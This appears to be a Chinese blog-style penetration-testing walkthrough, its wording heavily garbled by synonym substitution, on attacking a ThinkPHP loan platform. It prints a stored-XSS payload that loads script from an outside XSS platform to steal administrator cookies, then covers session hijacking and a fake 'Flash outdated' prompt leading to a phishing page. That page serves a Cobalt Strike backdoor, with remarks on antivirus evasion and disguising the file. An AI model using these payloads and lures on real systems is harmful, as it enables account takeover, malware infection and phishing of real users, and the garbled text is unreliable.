php贷款体系源码技巧_收集安然进修渗透测试钓鱼案例夯实根本

本文仅用于技能谈论与研究，对付所有条记中复现的这些终端或者做事器，都是自行搭建的环境进行渗透的。
我将利用Kali Linux作为这次学习的攻击者机器。
这里利用的技能仅用于学习教诲目的，如果列出的技能用于其他任何目标，本站及作者概不卖力。

名言：

你对这行的兴趣，决定你在这行的造诣！

2021最新整理网络安全\渗透测试/安全学习（全套视频、大厂面经、佳构手册、必备工具包）一>关注我，私信回答“资料”获取<一

网络钓鱼是社会工程学攻击办法之一，紧张是通过对受害者生理弱点、本能反应、好奇心、信赖、贪婪等生理陷阱进行诸如欺骗、侵害等危害手段！

网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全寻衅之一。
无论是获取密码等，还是其他敏感信息，黑客都在利用电子邮件、社交媒体、电话和任何可能的通信办法盗取有代价的数据。

网络钓鱼攻击的兴起对所有组织都构成了重大威胁。
主要的是，如果他们要保护自己的信息，所有组织都该当知道如何创造一些最常见的网络钓鱼骗局。
同样还要熟习攻击者用来履行这些骗局的一些最常见的技能类型。

这篇紧张演示如何利用XSS植入钓鱼，得到管理员内部电脑权限！

黑客（攻击者）：

IP：192.168.1.9

系统：kali.2020.4

kali上作为cs的做事端！

VPS做事器：

thinkphp平台地址：http://test1.dayuixiyou.cn/

钓鱼地址：http://flash.dayuixiyou.cn

办公电脑：

系统：windwos7

双网卡：

192.168.175.153

10.10.1.5

目前kali上运行了Cobalt strike ，攻击者在自己的公网VPS做事器上制作了后门页面钓鱼，通过渗透创造thinkphp贷款平台页面存在XSS漏洞利用，通过插入XSS-js代码，植入链接，终极黑客掌握管理员办公电脑的过程！
！

这次演示贷款thinkphp平台在公网做事器上！

进入个人中央！

注册用户名密码！

登任命户名密码后，普通用户界面！
点击设置！

输入结算信息，测试下！

输入：

测试结果修正成功！
查看下前端…

查看源代码-编辑后查看到没变动，XSS代码还是存在…解释存在XSS攻击

https://xss.pt/xss.php?do=login进入XSS利用平台，google也有很多别的平台！
！
随意注册一个账号！

创建一个新的项目，随意填写！

选择Keepsession保持会话！
下一步！

会弹出须要实行的XSS利用代码…选择标准代码测试！

</tExtArEa>'"><sCRiPt sRC=https://xss.pt..aJ></sCrIpT>

</tExtArEa>'"><sCRiPt sRC=https://xss.pt/..aJ></sCrIpT>

这一段便是payload！
将XSS连接信息返回到https://xss.pt平台上！

提交信息后，可看到网络net中XSS实行成功了…

实行成功，那么XSS平台就收到了信息，可看到！

点击提现…

申请结算，成功后，会将XSS实行代码转发到后台结算该模块中！

当后台管理员访问管理界面，给客户结算资金的时候，点击提现申请模块！
就会实行XSS植入的代码！
！

这时候，就返回了管理员的cookie和URL信息！

目录扫描得到管理后台登录页面，通过Burp suite转包拦截后！

将XSS平台获取XSS漏洞植入代码返回的包中，修正个中的url和cookie信息！

send实行后，通过cookie进入到了管理员后台！

复制URL！

浏览器中访问后，正常进入管理员后台！

在公网做事器搭建钓鱼页面，任何能访问互联网客户都可以访问该页面！

利用Cobal Strike天生C#措辞的shell…

利用该shell进行稠浊，并利用python的tinyaes模块稠浊也行，在来个分离免杀，末了利用pyinstaller天生exe外壳…必过全国杀毒软件！
（不演示过程）将flash修正名字为：flashplayer_install_cn.exe（或者修正为update等吸引人下载的名称都行）

这是Flash贷款平台源码文件目录！
！

修正index.html代码，找到个中href="进行修正为：flashplayer_install_cn.exe意思便是点击页面立即下载就能自动下载目录下的exe后门文件！

在准备个js文件，意思是实行该js后，会在页面提示：

您的 FLASH 版本过低，考试测验升级后访问该页面!

并访问到该页面：http://flash.dayuixiyou.cn/

将exe和js都上传到功能网做事器apache底层！
测试访问可看到正常读取，确保内网管理员能实行XSS后访问到js文件，这里就可以开始了！

可看到利用（三）中XSS利用的方法，实行插入：

“><”#须要前后加入闭合 “> <”

当"立即提交" 后直接实行了XSS植入的js文件，并提示了js中的内容！
！

然后点确定后，直接跳转到flash页面！

和（三）中的方法一样，须要在后台管理页面也实行XSS，须要结算金额，让管理员去结算的时候点击实行XSS！

5、实行XSS下载flash

可看到内网管理员上班期间，登录到管理后台，登录管理员用户后，事情职责须要给客户结算金额，点击了提现申请，一样平常客户安全意识极差！
！

点击完成后，涌现了您的 FLASH 版本过低，考试测验升级后访问该页面!，一样平常情形下都会点击确认！

确认后跳转到flash页面，逼真的页面！
！
点击立即下载！
！
这里有个20.1MB的大小信息，这里大略在html修正下数字和EXE内容大小即可！

可看到下载了该后门，这里图标我没修正，google或者百度利用Folder Changer修正成flash安装包的图标更逼真！
！
这里的exe是全免杀的，杀毒软件都无法放行！
！

6、成功XSS钓鱼

实行安装！

成功在kali攻击机上的CS上线，可看到获取到了管理员电脑的权限！
！

这里通过渗透中，找到了某平台的XSS漏洞，利用XSS漏洞植入代码实行，诱骗到了对方客服或者管理员的内网电脑权限！

个中最少须要熟习如何搭站、HTML、js、域名、XSS、免杀、CS4等等知识才可搭建！

那么很多人都说flash都是经典的钓鱼漏洞了，全国当心性都会高很多，那么我还是老话，供应的是思路，如果是一个破解软件，一个购买网站，一个利用虚荣心或者是贪小便宜的购物页面，等等进行钓鱼，进行各种的植入的话，那有多少人会中招？

希望大家提高安全意识，没有网络安全就没有国家安全！

虽然根本，但是必须牢记于心。